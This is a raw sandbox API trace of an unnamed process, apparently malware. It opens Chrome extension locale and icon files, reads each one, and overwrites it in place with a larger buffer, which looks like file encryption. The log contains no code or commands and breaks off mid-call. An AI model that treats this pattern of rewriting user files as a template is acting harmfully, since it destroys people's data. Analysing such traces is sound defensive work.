SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.888] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x69c, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x359f2d0*=0x69c, lpOverlapped=0x0) returned 1 [0161.888] CloseHandle (hObject=0x1d8) returned 1 [0161.888] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.890] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.890] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x109 [0161.890] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.890] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.890] ReleaseMutex (hMutex=0x168) returned 1 [0161.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.890] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.890] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ef2258, nNumberOfBytesToRead=0x109, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ef2258*, lpNumberOfBytesRead=0x359f2bc*=0x109, lpOverlapped=0x0) returned 1 [0161.891] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.891] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x691, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x359f2d0*=0x691, lpOverlapped=0x0) returned 1 [0161.892] CloseHandle (hObject=0x1d8) returned 1 [0161.892] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.893] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.893] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xbb [0161.893] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.893] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.894] ReleaseMutex (hMutex=0x168) returned 1 [0161.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.894] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ee0438, nNumberOfBytesToRead=0xbb, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee0438*, lpNumberOfBytesRead=0x359f2bc*=0xbb, lpOverlapped=0x0) returned 1 [0161.895] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.895] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x643, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x359f2d0*=0x643, lpOverlapped=0x0) returned 1 [0161.896] CloseHandle (hObject=0x1d8) returned 1 [0161.896] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.897] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.897] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xbb [0161.897] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.897] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.897] ReleaseMutex (hMutex=0x168) returned 1 [0161.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.897] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ee0438, nNumberOfBytesToRead=0xbb, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee0438*, lpNumberOfBytesRead=0x359f2bc*=0xbb, lpOverlapped=0x0) returned 1 [0161.899] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.899] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x643, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x359f2d0*=0x643, lpOverlapped=0x0) returned 1 [0161.899] CloseHandle (hObject=0x1d8) returned 1 [0161.899] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.901] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.901] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xd9 [0161.901] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.901] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.901] ReleaseMutex (hMutex=0x168) returned 1 [0161.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.901] ReadFile (in: hFile=0x1d8, lpBuffer=0x26c4f58, nNumberOfBytesToRead=0xd9, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26c4f58*, lpNumberOfBytesRead=0x359f2bc*=0xd9, lpOverlapped=0x0) returned 1 [0161.903] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.903] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x661, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x359f2d0*=0x661, lpOverlapped=0x0) returned 1 [0161.903] CloseHandle (hObject=0x1d8) returned 1 [0161.904] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ne\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.905] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.905] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x20b [0161.905] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.905] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.905] ReleaseMutex (hMutex=0x168) returned 1 [0161.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.905] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.905] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f25a38, nNumberOfBytesToRead=0x20b, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f25a38*, lpNumberOfBytesRead=0x359f2bc*=0x20b, lpOverlapped=0x0) returned 1 [0161.906] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.906] WriteFile (in: hFile=0x1d8, lpBuffer=0x27fc5f8*, nNumberOfBytesToWrite=0x793, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x27fc5f8*, lpNumberOfBytesWritten=0x359f2d0*=0x793, lpOverlapped=0x0) returned 1 [0161.907] CloseHandle (hObject=0x1d8) returned 1 [0161.907] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\si\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.908] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.908] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x14e [0161.908] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.908] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.908] ReleaseMutex (hMutex=0x168) returned 1 [0161.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.908] ReadFile (in: hFile=0x1d8, lpBuffer=0x288ab48, nNumberOfBytesToRead=0x14e, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288ab48*, lpNumberOfBytesRead=0x359f2bc*=0x14e, lpOverlapped=0x0) returned 1 [0161.910] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.910] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x6d6, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x359f2d0*=0x6d6, lpOverlapped=0x0) returned 1 [0161.910] CloseHandle (hObject=0x1d8) returned 1 [0161.911] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.911] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.911] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x125 [0161.912] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.912] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.912] ReleaseMutex (hMutex=0x168) returned 1 [0161.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.912] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f1d0a8, nNumberOfBytesToRead=0x125, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f1d0a8*, lpNumberOfBytesRead=0x359f2bc*=0x125, lpOverlapped=0x0) returned 1 [0161.913] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.913] WriteFile (in: hFile=0x1d8, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x6ad, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x359f2d0*=0x6ad, lpOverlapped=0x0) returned 1 [0161.913] CloseHandle (hObject=0x1d8) returned 1 [0161.913] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\zu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.914] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.914] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xc2 [0161.914] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.914] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.914] ReleaseMutex (hMutex=0x168) returned 1 [0161.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0161.915] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0161.915] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ee0438, nNumberOfBytesToRead=0xc2, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ee0438*, lpNumberOfBytesRead=0x359f2bc*=0xc2, lpOverlapped=0x0) returned 1 [0161.916] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0161.916] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x64a, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x359f2d0*=0x64a, lpOverlapped=0x0) returned 1 [0161.916] CloseHandle (hObject=0x1d8) returned 1 [0161.917] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\images\\icon_128.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0161.917] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.917] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1109 [0161.918] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0161.918] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0161.918] ReleaseMutex (hMutex=0x168) returned 1 [0161.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icon_128.png", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0161.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="icon_128.png", cchWideChar=12, lpMultiByteStr=0x1f735ac, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icon_128.png", lpUsedDefaultChar=0x0) returned 12 [0161.918] ReadFile (in: hFile=0x1d8, lpBuffer=0x25adba8, nNumberOfBytesToRead=0x1109, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25adba8*, lpNumberOfBytesRead=0x359f2bc*=0x1109, lpOverlapped=0x0) returned 1 [0162.291] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0162.291] WriteFile (in: hFile=0x1d8, lpBuffer=0x286da88*, nNumberOfBytesToWrite=0x1691, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286da88*, lpNumberOfBytesWritten=0x359f2d0*=0x1691, lpOverlapped=0x0) returned 1 [0162.292] CloseHandle (hObject=0x1d8) returned 1 [0162.292] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0162.293] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0162.293] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x376 [0162.293] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0162.294] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0162.294] ReleaseMutex (hMutex=0x168) returned 1 [0162.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0162.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages.json", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages.json", lpUsedDefaultChar=0x0) returned 13 [0162.294] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f4ad38, nNumberOfBytesToRead=0x376, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4ad38*, lpNumberOfBytesRead=0x359f2bc*=0x376, lpOverlapped=0x0) returned 1 [0162.394] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, 